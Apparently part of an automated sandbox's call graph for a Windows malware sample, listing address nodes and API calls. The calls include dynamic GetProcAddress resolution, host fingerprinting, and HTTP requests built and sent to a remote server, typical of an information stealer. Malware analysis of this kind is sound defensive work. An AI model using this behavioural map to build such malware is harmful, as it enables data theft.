77938->77939 77940 7745c0 34 API calls 77939->77940 77941 77358c 77940->77941 77942 7745c0 34 API calls 77941->77942 77943 7735a5 77942->77943 77944 7745c0 34 API calls 77943->77944 77945 7735be 77944->77945 77946 7745c0 34 API calls 77945->77946 77947 7735d7 77946->77947 77948 7745c0 34 API calls 77947->77948 77949 7735f0 77948->77949 77950 7745c0 34 API calls 77949->77950 77951 773609 77950->77951 77952 7745c0 34 API calls 77951->77952 77953 773622 77952->77953 77954 7745c0 34 API calls 77953->77954 77955 77363b 77954->77955 77956 7745c0 34 API calls 77955->77956 77957 773654 77956->77957 77958 7745c0 34 API calls 77957->77958 77959 77366d 77958->77959 77960 7745c0 34 API calls 77959->77960 77961 773686 77960->77961 77962 7745c0 34 API calls 77961->77962 77963 77369f 77962->77963 77964 7745c0 34 API calls 77963->77964 77965 7736b8 77964->77965 77966 7745c0 34 API calls 77965->77966 77967 7736d1 77966->77967 77968 7745c0 34 API calls 77967->77968 77969 7736ea 77968->77969 77970 7745c0 34 API calls 77969->77970 77971 773703 77970->77971 77972 7745c0 34 API calls 77971->77972 77973 77371c 77972->77973 77974 7745c0 34 API calls 77973->77974 77975 773735 77974->77975 77976 7745c0 34 API calls 77975->77976 77977 77374e 77976->77977 77978 7745c0 34 API calls 77977->77978 77979 773767 77978->77979 77980 7745c0 34 API calls 77979->77980 77981 773780 77980->77981 77982 7745c0 34 API calls 77981->77982 77983 773799 77982->77983 77984 7745c0 34 API calls 77983->77984 77985 7737b2 77984->77985 77986 7745c0 34 API calls 77985->77986 77987 7737cb 77986->77987 77988 7745c0 34 API calls 77987->77988 77989 7737e4 77988->77989 77990 7745c0 34 API calls 77989->77990 77991 7737fd 77990->77991 77992 7745c0 34 API calls 77991->77992 77993 773816 77992->77993 77994 7745c0 34 API calls 77993->77994 77995 77382f 77994->77995 77996 7745c0 34 API calls 77995->77996 77997 773848 77996->77997 77998 7745c0 34 API calls 77997->77998 77999 773861 77998->77999 78000 7745c0 34 API calls 77999->78000 78001 77387a 78000->78001 78002 7745c0 34 API calls 78001->78002 78003 773893 78002->78003 78004 7745c0 34 API calls 78003->78004 78005 7738ac 78004->78005 78006 7745c0 34 API calls 78005->78006 78007 7738c5 78006->78007 78008 7745c0 34 API calls 78007->78008 78009 7738de 78008->78009 78010 7745c0 34 API calls 78009->78010 78011 7738f7 78010->78011 78012 7745c0 34 API calls 78011->78012 78013 773910 78012->78013 78014 7745c0 34 API calls 78013->78014 78015 773929 78014->78015 78016 7745c0 34 API calls 78015->78016 78017 773942 78016->78017 78018 7745c0 34 API calls 78017->78018 78019 77395b 78018->78019 78020 7745c0 34 API calls 78019->78020 78021 773974 78020->78021 78022 7745c0 34 API calls 78021->78022 78023 77398d 78022->78023 78024 7745c0 34 API calls 78023->78024 78025 7739a6 78024->78025 78026 7745c0 34 API calls 78025->78026 78027 7739bf 78026->78027 78028 7745c0 34 API calls 78027->78028 78029 7739d8 78028->78029 78030 7745c0 34 API calls 78029->78030 78031 7739f1 78030->78031 78032 7745c0 34 API calls 78031->78032 78033 773a0a 78032->78033 78034 7745c0 34 API calls 78033->78034 78035 773a23 78034->78035 78036 7745c0 34 API calls 78035->78036 78037 773a3c 78036->78037 78038 7745c0 34 API calls 78037->78038 78039 773a55 78038->78039 78040 7745c0 34 API calls 78039->78040 78041 773a6e 78040->78041 78042 7745c0 34 API calls 78041->78042 78043 773a87 78042->78043 78044 7745c0 34 API calls 78043->78044 78045 773aa0 78044->78045 78046 7745c0 34 API calls 78045->78046 78047 773ab9 78046->78047 78048 7745c0 34 API calls 78047->78048 78049 773ad2 78048->78049 78050 7745c0 34 API calls 78049->78050 78051 773aeb 78050->78051 78052 7745c0 34 API calls 78051->78052 78053 773b04 78052->78053 78054 7745c0 34 API calls 78053->78054 78055 773b1d 78054->78055 78056 7745c0 34 API calls 78055->78056 78057 773b36 78056->78057 78058 7745c0 34 API calls 78057->78058 78059 773b4f 78058->78059 78060 7745c0 34 API calls 78059->78060 78061 773b68 78060->78061 78062 7745c0 34 API calls 78061->78062 78063 773b81 78062->78063 78064 7745c0 34 API calls 78063->78064 78065 773b9a 78064->78065 78066 7745c0 34 API calls 78065->78066 78067 773bb3 78066->78067 78068 7745c0 34 API calls 78067->78068 78069 773bcc 78068->78069 78070 7745c0 34 API calls 78069->78070 78071 773be5 78070->78071 78072 7745c0 34 API calls 78071->78072 78073 773bfe 78072->78073 78074 7745c0 34 API calls 78073->78074 78075 773c17 78074->78075 78076 7745c0 34 API calls 78075->78076 78077 773c30 78076->78077 78078 7745c0 34 API calls 78077->78078 78079 773c49 78078->78079 78080 7745c0 34 API calls 78079->78080 78081 773c62 78080->78081 78082 7745c0 34 API calls 78081->78082 78083 773c7b 78082->78083 78084 7745c0 34 API calls 78083->78084 78085 773c94 78084->78085 78086 7745c0 34 API calls 78085->78086 78087 773cad 78086->78087 78088 7745c0 34 API calls 78087->78088 78089 773cc6 78088->78089 78090 7745c0 34 API calls 78089->78090 78091 773cdf 78090->78091 78092 7745c0 34 API calls 78091->78092 78093 773cf8 78092->78093 78094 7745c0 34 API calls 78093->78094 78095 773d11 78094->78095 78096 7745c0 34 API calls 78095->78096 78097 773d2a 78096->78097 78098 7745c0 34 API calls 78097->78098 78099 773d43 78098->78099 78100 7745c0 34 API calls 78099->78100 78101 773d5c 78100->78101 78102 7745c0 34 API calls 78101->78102 78103 773d75 78102->78103 78104 7745c0 34 API calls 78103->78104 78105 773d8e 78104->78105 78106 7745c0 34 API calls 78105->78106 78107 773da7 78106->78107 78108 7745c0 34 API calls 78107->78108 78109 773dc0 78108->78109 78110 7745c0 34 API calls 78109->78110 78111 773dd9 78110->78111 78112 7745c0 34 API calls 78111->78112 78113 773df2 78112->78113 78114 7745c0 34 API calls 78113->78114 78115 773e0b 78114->78115 78116 7745c0 34 API calls 78115->78116 78117 773e24 78116->78117 78118 7745c0 34 API calls 78117->78118 78119 773e3d 78118->78119 78120 7745c0 34 API calls 78119->78120 78121 773e56 78120->78121 78122 7745c0 34 API calls 78121->78122 78123 773e6f 78122->78123 78124 7745c0 34 API calls 78123->78124 78125 773e88 78124->78125 78126 7745c0 34 API calls 78125->78126 78127 773ea1 78126->78127 78128 7745c0 34 API calls 78127->78128 78129 773eba 78128->78129 78130 7745c0 34 API calls 78129->78130 78131 773ed3 78130->78131 78132 7745c0 34 API calls 78131->78132 78133 773eec 78132->78133 78134 7745c0 34 API calls 78133->78134 78135 773f05 78134->78135 78136 7745c0 34 API calls 78135->78136 78137 773f1e 78136->78137 78138 7745c0 34 API calls 78137->78138 78139 773f37 78138->78139 78140 7745c0 34 API calls 78139->78140 78141 773f50 78140->78141 78142 7745c0 34 API calls 78141->78142 78143 773f69 78142->78143 78144 7745c0 34 API calls 78143->78144 78145 773f82 78144->78145 78146 7745c0 34 API calls 78145->78146 78147 773f9b 78146->78147 78148 7745c0 34 API calls 78147->78148 78149 773fb4 78148->78149 78150 7745c0 34 API calls 78149->78150 78151 773fcd 78150->78151 78152 7745c0 34 API calls 78151->78152 78153 773fe6 78152->78153 78154 7745c0 34 API calls 78153->78154 78155 773fff 78154->78155 78156 7745c0 34 API calls 78155->78156 78157 774018 78156->78157 78158 7745c0 34 API calls 78157->78158 78159 774031 78158->78159 78160 7745c0 34 API calls 78159->78160 78161 77404a 78160->78161 78162 7745c0 34 API calls 78161->78162 78163 774063 78162->78163 78164 7745c0 34 API calls 78163->78164 78165 77407c 78164->78165 78166 7745c0 34 API calls 78165->78166 78167 774095 78166->78167 78168 7745c0 34 API calls 78167->78168 78169 7740ae 78168->78169 78170 7745c0 34 API calls 78169->78170 78171 7740c7 78170->78171 78172 7745c0 34 API calls 78171->78172 78173 7740e0 78172->78173 78174 7745c0 34 API calls 78173->78174 78175 7740f9 78174->78175 78176 7745c0 34 API calls 78175->78176 78177 774112 78176->78177 78178 7745c0 34 API calls 78177->78178 78179 77412b 78178->78179 78180 7745c0 34 API calls 78179->78180 78181 774144 78180->78181 78182 7745c0 34 API calls 78181->78182 78183 77415d 78182->78183 78184 7745c0 34 API calls 78183->78184 78185 774176 78184->78185 78186 7745c0 34 API calls 78185->78186 78187 77418f 78186->78187 78188 7745c0 34 API calls 78187->78188 78189 7741a8 78188->78189 78190 7745c0 34 API calls 78189->78190 78191 7741c1 78190->78191 78192 7745c0 34 API calls 78191->78192 78193 7741da 78192->78193 78194 7745c0 34 API calls 78193->78194 78195 7741f3 78194->78195 78196 7745c0 34 API calls 78195->78196 78197 77420c 78196->78197 78198 7745c0 34 API calls 78197->78198 78199 774225 78198->78199 78200 7745c0 34 API calls 78199->78200 78201 77423e 78200->78201 78202 7745c0 34 API calls 78201->78202 78203 774257 78202->78203 78204 7745c0 34 API calls 78203->78204 78205 774270 78204->78205 78206 7745c0 34 API calls 78205->78206 78207 774289 78206->78207 78208 7745c0 34 API calls 78207->78208 78209 7742a2 78208->78209 78210 7745c0 34 API calls 78209->78210 78211 7742bb 78210->78211 78212 7745c0 34 API calls 78211->78212 78213 7742d4 78212->78213 78214 7745c0 34 API calls 78213->78214 78215 7742ed 78214->78215 78216 7745c0 34 API calls 78215->78216 78217 774306 78216->78217 78218 7745c0 34 API calls 78217->78218 78219 77431f 78218->78219 78220 7745c0 34 API calls 78219->78220 78221 774338 78220->78221 78222 7745c0 34 API calls 78221->78222 78223 774351 78222->78223 78224 7745c0 34 API calls 78223->78224 78225 77436a 78224->78225 78226 7745c0 34 API calls 78225->78226 78227 774383 78226->78227 78228 7745c0 34 API calls 78227->78228 78229 77439c 78228->78229 78230 7745c0 34 API calls 78229->78230 78231 7743b5 78230->78231 78232 7745c0 34 API calls 78231->78232 78233 7743ce 78232->78233 78234 7745c0 34 API calls 78233->78234 78235 7743e7 78234->78235 78236 7745c0 34 API calls 78235->78236 78237 774400 78236->78237 78238 7745c0 34 API calls 78237->78238 78239 774419 78238->78239 78240 7745c0 34 API calls 78239->78240 78241 774432 78240->78241 78242 7745c0 34 API calls 78241->78242 78243 77444b 78242->78243 78244 7745c0 34 API calls 78243->78244 78245 774464 78244->78245 78246 7745c0 34 API calls 78245->78246 78247 77447d 78246->78247 78248 7745c0 34 API calls 78247->78248 78249 774496 78248->78249 78250 7745c0 34 API calls 78249->78250 78251 7744af 78250->78251 78252 7745c0 34 API calls 78251->78252 78253 7744c8 78252->78253 78254 7745c0 34 API calls 78253->78254 78255 7744e1 78254->78255 78256 7745c0 34 API calls 78255->78256 78257 7744fa 78256->78257 78258 7745c0 34 API calls 78257->78258 78259 774513 78258->78259 78260 7745c0 34 API calls 78259->78260 78261 77452c 78260->78261 78262 7745c0 34 API calls 78261->78262 78263 774545 78262->78263 78264 7745c0 34 API calls 78263->78264 78265 77455e 78264->78265 78266 7745c0 34 API calls 78265->78266 78267 774577 78266->78267 78268 7745c0 34 API calls 78267->78268 78269 774590 78268->78269 78270 7745c0 34 API calls 78269->78270 78271 7745a9 78270->78271 78272 789c10 78271->78272 78273 789c20 43 API calls 78272->78273 78274 78a036 8 API calls 78272->78274 78273->78274 78275 78a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 78274->78275 78276 78a146 78274->78276 78275->78276 78277 78a153 8 API calls 78276->78277 78278 78a216 78276->78278 78277->78278 78279 78a298 78278->78279 78280 78a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 78278->78280 78281 78a2a5 6 API calls 78279->78281 78282 78a337 78279->78282 78280->78279 78281->78282 78283 78a41f 78282->78283 78284 78a344 9 API calls 78282->78284 78285 78a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 78283->78285 78286 78a4a2 78283->78286 78284->78283 78285->78286 78287 78a4ab GetProcAddress GetProcAddress 78286->78287 78288 78a4dc 78286->78288 78287->78288 78289 78a515 78288->78289 78290 78a4e5 GetProcAddress GetProcAddress 78288->78290 78291 78a612 78289->78291 78292 78a522 10 API calls 78289->78292 78290->78289 78293 78a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 78291->78293 78294 78a67d 78291->78294 78292->78291 78293->78294 78295 78a69e 78294->78295 78296 78a686 GetProcAddress 78294->78296 78297 785ca3 78295->78297 78298 78a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 78295->78298 78296->78295 78299 771590 78297->78299 78298->78297 79351 771670 78299->79351 78302 78a7a0 lstrcpy 78303 7715b5 78302->78303 78304 78a7a0 lstrcpy 78303->78304 78305 7715c7 78304->78305 78306 78a7a0 lstrcpy 78305->78306 78307 7715d9 78306->78307 78308 78a7a0 lstrcpy 78307->78308 78309 771663 78308->78309 78310 785510 78309->78310 78311 785521 78310->78311 78312 78a820 2 API calls 78311->78312 78313 78552e 78312->78313 78314 78a820 2 API calls 78313->78314 78315 78553b 78314->78315 78316 78a820 2 API calls 78315->78316 78317 785548 78316->78317 78318 78a740 lstrcpy 78317->78318 78319 785555 78318->78319 78320 78a740 lstrcpy 78319->78320 78321 785562 78320->78321 78322 78a740 lstrcpy 78321->78322 78323 78556f 78322->78323 78324 78a740 lstrcpy 78323->78324 78362 78557c 78324->78362 78325 771590 lstrcpy 78325->78362 78326 7852c0 29 API calls 78326->78362 78327 785643 StrCmpCA 78327->78362 78328 7856a0 StrCmpCA 78329 7857dc 78328->78329 78328->78362 78330 78a8a0 lstrcpy 78329->78330 78331 7857e8 78330->78331 78334 78a820 2 API calls 78331->78334 78332 78a740 lstrcpy 78332->78362 78333 78a820 lstrlenA lstrcpy 78333->78362 78336 7857f6 78334->78336 78335 785856 StrCmpCA 78337 785991 78335->78337 78335->78362 78338 78a820 2 API calls 78336->78338 78340 78a8a0 lstrcpy 78337->78340 78339 785805 78338->78339 78341 771670 lstrcpy 78339->78341 78342 78599d 78340->78342 78363 785811 78341->78363 78343 78a820 2 API calls 78342->78343 78345 7859ab 78343->78345 78344 785a0b StrCmpCA 78347 785a28 78344->78347 78348 785a16 Sleep 78344->78348 78346 78a820 2 API calls 78345->78346 78349 7859ba 78346->78349 78350 78a8a0 lstrcpy 78347->78350 78348->78362 78351 771670 lstrcpy 78349->78351 78352 785a34 78350->78352 78351->78363 78353 78a820 2 API calls 78352->78353 78354 785a43 78353->78354 78356 78a820 2 API calls 78354->78356 78355 7851f0 23 API calls 78355->78362 78357 785a52 78356->78357 78359 771670 lstrcpy 78357->78359 78358 78578a StrCmpCA 78358->78362 78359->78363 78360 78593f StrCmpCA 78360->78362 78361 78a7a0 lstrcpy 78361->78362 78362->78325 78362->78326 78362->78327 78362->78328 78362->78332 78362->78333 78362->78335 78362->78344 78362->78355 78362->78358 78362->78360 78362->78361 78364 78a8a0 lstrcpy 78362->78364 78363->77417 78364->78362 78366 78754c 78365->78366 78367 787553 GetVolumeInformationA 78365->78367 78366->78367 78372 787591 78367->78372 78368 7875fc GetProcessHeap HeapAlloc 78369 787628 wsprintfA 78368->78369 78370 787619 78368->78370 78371 78a740 lstrcpy 78369->78371 78373 78a740 lstrcpy 78370->78373 78374 785da7 78371->78374 78372->78368 78373->78374 78374->77438 78376 78a7a0 lstrcpy 78375->78376 78377 774899 78376->78377 79360 7747b0 78377->79360 78379 7748a5 78380 78a740 lstrcpy 78379->78380 78381 7748d7 78380->78381 78382 78a740 lstrcpy 78381->78382 78383 7748e4 78382->78383 78384 78a740 lstrcpy 78383->78384 78385 7748f1 78384->78385 78386 78a740 lstrcpy 78385->78386 78387 7748fe 78386->78387 78388 78a740 lstrcpy 78387->78388 78389 77490b InternetOpenA StrCmpCA 78388->78389 78390 774944 78389->78390 78391 774ecb InternetCloseHandle 78390->78391 79368 788b60 78390->79368 78393 774ee8 78391->78393 79383 779ac0 CryptStringToBinaryA 78393->79383 78394 774963 79376 78a920 78394->79376 78398 774976 78399 78a8a0 lstrcpy 78398->78399 78404 77497f 78399->78404 78400 78a820 2 API calls 78401 774f05 78400->78401 78402 78a9b0 4 API calls 78401->78402 78405 774f1b 78402->78405 78403 774f27 ctype 78406 78a7a0 lstrcpy 78403->78406 78408 78a9b0 4 API calls 78404->78408 78407 78a8a0 lstrcpy 78405->78407 78419 774f57 78406->78419 78407->78403 78409 7749a9 78408->78409 78410 78a8a0 lstrcpy 78409->78410 78411 7749b2 78410->78411 78412 78a9b0 4 API calls 78411->78412 78413 7749d1 78412->78413 78414 78a8a0 lstrcpy 78413->78414 78415 7749da 78414->78415 78416 78a920 3 API calls 78415->78416 78417 7749f8 78416->78417 78418 78a8a0 lstrcpy 78417->78418 78420 774a01 78418->78420 78419->77441 78421 78a9b0 4 API calls 78420->78421 78422 774a20 78421->78422 78423 78a8a0 lstrcpy 78422->78423 78424 774a29 78423->78424 78425 78a9b0 4 API calls 78424->78425 78426 774a48 78425->78426 78427 78a8a0 lstrcpy 78426->78427 78428 774a51 78427->78428 78429 78a9b0 4 API calls 78428->78429 78430 774a7d 78429->78430 78431 78a920 3 API calls 78430->78431 78432 774a84 78431->78432 78433 78a8a0 lstrcpy 78432->78433 78434 774a8d 78433->78434 78435 774aa3 InternetConnectA 78434->78435 78435->78391 78436 774ad3 HttpOpenRequestA 78435->78436 78438 774ebe InternetCloseHandle 78436->78438 78439 774b28 78436->78439 78438->78391 78440 78a9b0 4 API calls 78439->78440 78441 774b3c 78440->78441 78442 78a8a0 lstrcpy 78441->78442 78443 774b45 78442->78443 78444 78a920 3 API calls 78443->78444 78445 774b63 78444->78445 78446 78a8a0 lstrcpy 78445->78446 78447 774b6c 78446->78447 78448 78a9b0 4 API calls 78447->78448 78449 774b8b 78448->78449 78450 78a8a0 lstrcpy 78449->78450 78451 774b94 78450->78451 78452 78a9b0 4 API calls 78451->78452 78453 774bb5 78452->78453 78454 78a8a0 lstrcpy 78453->78454 78455 774bbe 78454->78455 78456 78a9b0 4 API calls 78455->78456 78457 774bde 78456->78457 78458 78a8a0 lstrcpy 78457->78458 78459 774be7 78458->78459 78460 78a9b0 4 API calls 78459->78460 78461 774c06 78460->78461 78462 78a8a0 lstrcpy 78461->78462 78463 774c0f 78462->78463 78464 78a920 3 API calls 78463->78464 78465 774c2d 78464->78465 78466 78a8a0 lstrcpy 78465->78466 78467 774c36 78466->78467 78468 78a9b0 4 API calls 78467->78468 78469 774c55 78468->78469 78470 78a8a0 lstrcpy 78469->78470 78471 774c5e 78470->78471 78472 78a9b0 4 API calls 78471->78472 78473 774c7d 78472->78473 78474 78a8a0 lstrcpy 78473->78474 78475 774c86 78474->78475 78476 78a920 3 API calls 78475->78476 78477 774ca4 78476->78477 78478 78a8a0 lstrcpy 78477->78478 78479 774cad 78478->78479 78480 78a9b0 4 API calls 78479->78480 78481 774ccc 78480->78481 78482 78a8a0 lstrcpy 78481->78482 78483 774cd5 78482->78483 78484 78a9b0 4 API calls 78483->78484 78485 774cf6 78484->78485 78486 78a8a0 lstrcpy 78485->78486 78487 774cff 78486->78487 78488 78a9b0 4 API calls 78487->78488 78489 774d1f 78488->78489 78490 78a8a0 lstrcpy 78489->78490 78491 774d28 78490->78491 78492 78a9b0 4 API calls 78491->78492 78493 774d47 78492->78493 78494 78a8a0 lstrcpy 78493->78494 78495 774d50 78494->78495 78496 78a920 3 API calls 78495->78496 78497 774d6e 78496->78497 78498 78a8a0 lstrcpy 78497->78498 78499 774d77 78498->78499 78500 78a740 lstrcpy 78499->78500 78501 774d92 78500->78501 78502 78a920 3 API calls 78501->78502 78503 774db3 78502->78503 78504 78a920 3 API calls 78503->78504 78505 774dba 78504->78505 78506 78a8a0 lstrcpy 78505->78506 78507 774dc6 78506->78507 78508 774de7 lstrlenA 78507->78508 78509 774dfa 78508->78509 78510 774e03 lstrlenA 78509->78510 79382 78aad0 78510->79382 78512 774e13 HttpSendRequestA 78513 774e32 InternetReadFile 78512->78513 78514 774e67 InternetCloseHandle 78513->78514 78519 774e5e 78513->78519 78517 78a800 78514->78517 78516 78a9b0 4 API calls 78516->78519 78517->78438 78518 78a8a0 lstrcpy 78518->78519 78519->78513 78519->78514 78519->78516 78519->78518 79392 78aad0 78520->79392 78522 7817c4 StrCmpCA 78523 7817cf ExitProcess 78522->78523 78524 7817d7 78522->78524 78525 7817e7 strtok_s 78524->78525 78539 7817f4 78525->78539 78526 7819c2 78526->77443 78527 78199e strtok_s 78527->78539 78528 78185d StrCmpCA 78528->78539 78529 78187f StrCmpCA 78529->78539 78530 781970 StrCmpCA 78530->78539 78531 7818f1 StrCmpCA 78531->78539 78532 781951 StrCmpCA 78532->78539 78533 781932 StrCmpCA 78533->78539 78534 781913 StrCmpCA 78534->78539 78535 7818ad StrCmpCA 78535->78539 78536 7818cf StrCmpCA 78536->78539 78537 78a820 lstrlenA lstrcpy 78537->78539 78538 78a820 2 API calls 78538->78527 78539->78526 78539->78527 78539->78528 78539->78529 78539->78530 78539->78531 78539->78532 78539->78533 78539->78534 78539->78535 78539->78536 78539->78537 78539->78538 78541 78a7a0 lstrcpy 78540->78541 78542 775979 78541->78542 78543 7747b0 5 API calls 78542->78543 78544 775985 78543->78544 78545 78a740 lstrcpy 78544->78545 78546 7759ba 78545->78546 78547 78a740 lstrcpy 78546->78547 78548 7759c7 78547->78548 78549 78a740 lstrcpy 78548->78549 78550 7759d4 78549->78550 78551 78a740 lstrcpy 78550->78551 78552 7759e1 78551->78552 78553 78a740 lstrcpy 78552->78553 78554 7759ee InternetOpenA StrCmpCA 78553->78554 78555 775a1d 78554->78555 78556 775fc3 InternetCloseHandle 78555->78556 78558 788b60 3 API calls 78555->78558 78557 775fe0 78556->78557 78560 779ac0 4 API calls 78557->78560 78559 775a3c 78558->78559 78561 78a920 3 API calls 78559->78561 78562 775fe6 78560->78562 78563 775a4f 78561->78563 78565 78a820 2 API calls 78562->78565 78568 77601f ctype 78562->78568 78564 78a8a0 lstrcpy 78563->78564 78570 775a58 78564->78570 78566 775ffd 78565->78566 78567 78a9b0 4 API calls 78566->78567 78569 776013 78567->78569 78572 78a7a0 lstrcpy 78568->78572 78571 78a8a0 lstrcpy 78569->78571 78573 78a9b0 4 API calls 78570->78573 78571->78568 78582 77604f 78572->78582 78574 775a82 78573->78574 78575 78a8a0 lstrcpy 78574->78575 78576 775a8b 78575->78576 78577 78a9b0 4 API calls 78576->78577 78578 775aaa 78577->78578 78579 78a8a0 lstrcpy 78578->78579 78580 775ab3 78579->78580 78581 78a920 3 API calls 78580->78581 78583 775ad1 78581->78583 78582->77449 78584 78a8a0 lstrcpy 78583->78584 78585 775ada 78584->78585 78586 78a9b0 4 API calls 78585->78586 78587 775af9 78586->78587 78588 78a8a0 lstrcpy 78587->78588 78589 775b02 78588->78589 78590 78a9b0 4 API calls 78589->78590 78591 775b21 78590->78591 78592 78a8a0 lstrcpy 78591->78592 78593 775b2a 78592->78593 78594 78a9b0 4 API calls 78593->78594 78595 775b56 78594->78595 78596 78a920 3 API calls 78595->78596 78597 775b5d 78596->78597 78598 78a8a0 lstrcpy 78597->78598 78599 775b66 78598->78599 78600 775b7c InternetConnectA 78599->78600 78600->78556 78601 775bac HttpOpenRequestA 78600->78601 78603 775fb6 InternetCloseHandle 78601->78603 78604 775c0b 78601->78604 78603->78556 78605 78a9b0 4 API calls 78604->78605 78606 775c1f 78605->78606 78607 78a8a0 lstrcpy 78606->78607 78608 775c28 78607->78608 78609 78a920 3 API calls 78608->78609 78610 775c46 78609->78610 78611 78a8a0 lstrcpy 78610->78611 78612 775c4f 78611->78612 78613 78a9b0 4 API calls 78612->78613 78614 775c6e 78613->78614 78615 78a8a0 lstrcpy 78614->78615 78616 775c77 78615->78616 78617 78a9b0 4 API calls 78616->78617 78618 775c98 78617->78618 78619 78a8a0 lstrcpy 78618->78619 78620 775ca1 78619->78620 78621 78a9b0 4 API calls 78620->78621 78622 775cc1 78621->78622 78623 78a8a0 lstrcpy 78622->78623 78624 775cca 78623->78624 78625 78a9b0 4 API calls 78624->78625 78626 775ce9 78625->78626 78627 78a8a0 lstrcpy 78626->78627 78628 775cf2 78627->78628 78629 78a920 3 API calls 78628->78629 78630 775d10 78629->78630 78631 78a8a0 lstrcpy 78630->78631 78632 775d19 78631->78632 78633 78a9b0 4 API calls 78632->78633 78634 775d38 78633->78634 78635 78a8a0 lstrcpy 78634->78635 78636 775d41 78635->78636 78637 78a9b0 4 API calls 78636->78637 78638 775d60 78637->78638 78639 78a8a0 lstrcpy 78638->78639 78640 775d69 78639->78640 78641 78a920 3 API calls 78640->78641 78642 775d87 78641->78642 78643 78a8a0 lstrcpy 78642->78643 78644 775d90 78643->78644 78645 78a9b0 4 API calls 78644->78645 78646 775daf 78645->78646 78647 78a8a0 lstrcpy 78646->78647 78648 775db8 78647->78648 78649 78a9b0 4 API calls 78648->78649 78650 775dd9 78649->78650 78651 78a8a0 lstrcpy 78650->78651 78652 775de2 78651->78652 78653 78a9b0 4 API calls 78652->78653 78654 775e02 78653->78654 78655 78a8a0 lstrcpy 78654->78655 78656 775e0b 78655->78656 78657 78a9b0 4 API calls 78656->78657 78658 775e2a 78657->78658 78659 78a8a0 lstrcpy 78658->78659 78660 775e33 78659->78660 78661 78a920 3 API calls 78660->78661 78662 775e54 78661->78662 78663 78a8a0 lstrcpy 78662->78663 78664 775e5d 78663->78664 78665 775e70 lstrlenA 78664->78665 79393 78aad0 78665->79393 78667 775e81 lstrlenA GetProcessHeap HeapAlloc 79394 78aad0 78667->79394 78669 775eae lstrlenA 79395 78aad0 78669->79395 78671 775ebe memcpy 79396 78aad0 78671->79396 78673 775ed7 lstrlenA 78674 775ee7 78673->78674 78675 775ef0 lstrlenA memcpy 78674->78675 79397 78aad0 78675->79397 78677 775f1a lstrlenA 79398 78aad0 78677->79398 78679 775f2a HttpSendRequestA 78680 775f35 InternetReadFile 78679->78680 78681 775f6a InternetCloseHandle 78680->78681 78685 775f61 78680->78685 78681->78603 78683 78a9b0 4 API calls 78683->78685 78684 78a8a0 lstrcpy 78684->78685 78685->78680 78685->78681 78685->78683 78685->78684 79399 78aad0 78686->79399 78688 781077 strtok_s 78691 781084 78688->78691 78689 781151 78689->77451 78690 78112d strtok_s 78690->78691 78691->78689 78691->78690 78692 78a820 lstrlenA lstrcpy 78691->78692 78692->78691 79400 78aad0 78693->79400 78695 780db7 strtok_s 78698 780dc4 78695->78698 78696 780f17 78696->77459 78697 780ef3 strtok_s 78697->78698 78698->78696 78698->78697 78699 780ea4 StrCmpCA 78698->78699 78700 780e27 StrCmpCA 78698->78700 78701 780e67 StrCmpCA 78698->78701 78702 78a820 lstrlenA lstrcpy 78698->78702 78699->78698 78700->78698 78701->78698 78702->78698 79401 78aad0 78703->79401 78705 780f67 strtok_s 78707 780f74 78705->78707 78706 781044 78706->77467 78707->78706 78708 780fb2 StrCmpCA 78707->78708 78709 78a820 lstrlenA lstrcpy 78707->78709 78710 781020 strtok_s 78707->78710 78708->78707 78709->78707 78710->78707 78712 78a740 lstrcpy 78711->78712 78713 781a26 78712->78713 78714 78a9b0 4 API calls 78713->78714 78715 781a37 78714->78715 78716 78a8a0 lstrcpy 78715->78716 78717 781a40 78716->78717 78718 78a9b0 4 API calls 78717->78718 78719 781a5b 78718->78719 78720 78a8a0 lstrcpy 78719->78720 78721 781a64 78720->78721 78722 78a9b0 4 API calls 78721->78722 78723 781a7d 78722->78723 78724 78a8a0 lstrcpy 78723->78724 78725 781a86 78724->78725 78726 78a9b0 4 API calls 78725->78726 78727 781aa1 78726->78727 78728 78a8a0 lstrcpy 78727->78728 78729 781aaa 78728->78729 78730 78a9b0 4 API calls 78729->78730 78731 781ac3 78730->78731 78732 78a8a0 lstrcpy 78731->78732 78733 781acc 78732->78733 78734 78a9b0 4 API calls 78733->78734 78735 781ae7 78734->78735 78736 78a8a0 lstrcpy 78735->78736 78737 781af0 78736->78737 78738 78a9b0 4 API calls 78737->78738 78739 781b09 78738->78739 78740 78a8a0 lstrcpy 78739->78740 78741 781b12 78740->78741 78742 78a9b0 4 API calls 78741->78742 78743 781b2d 78742->78743 78744 78a8a0 lstrcpy 78743->78744 78745 781b36 78744->78745 78746 78a9b0 4 API calls 78745->78746 78747 781b4f 78746->78747 78748 78a8a0 lstrcpy 78747->78748 78749 781b58 78748->78749 78750 78a9b0 4 API calls 78749->78750 78751 781b76 78750->78751 78752 78a8a0 lstrcpy 78751->78752 78753 781b7f 78752->78753 78754 787500 6 API calls 78753->78754 78755 781b96 78754->78755 78756 78a920 3 API calls 78755->78756 78757 781ba9 78756->78757 78758 78a8a0 lstrcpy 78757->78758 78759 781bb2 78758->78759 78760 78a9b0 4 API calls 78759->78760 78761 781bdc 78760->78761 78762 78a8a0 lstrcpy 78761->78762 78763 781be5 78762->78763 78764 78a9b0 4 API calls 78763->78764 78765 781c05 78764->78765 78766 78a8a0 lstrcpy 78765->78766 78767 781c0e 78766->78767 79402 787690 GetProcessHeap HeapAlloc 78767->79402 78770 78a9b0 4 API calls 78771 781c2e 78770->78771 78772 78a8a0 lstrcpy 78771->78772 78773 781c37 78772->78773 78774 78a9b0 4 API calls 78773->78774 78775 781c56 78774->78775 78776 78a8a0 lstrcpy 78775->78776 78777 781c5f 78776->78777 78778 78a9b0 4 API calls 78777->78778 78779 781c80 78778->78779 78780 78a8a0 lstrcpy 78779->78780 78781 781c89 78780->78781 79409 7877c0 GetCurrentProcess IsWow64Process 78781->79409 78784 78a9b0 4 API calls 78785 781ca9 78784->78785 78786 78a8a0 lstrcpy 78785->78786 78787 781cb2 78786->78787 78788 78a9b0 4 API calls 78787->78788 78789 781cd1 78788->78789 78790 78a8a0 lstrcpy 78789->78790 78791 781cda 78790->78791 78792 78a9b0 4 API calls 78791->78792 78793 781cfb 78792->78793 78794 78a8a0 lstrcpy 78793->78794 78795 781d04 78794->78795 78796 787850 3 API calls 78795->78796 78797 781d14 78796->78797 78798 78a9b0 4 API calls 78797->78798 78799 781d24 78798->78799 78800 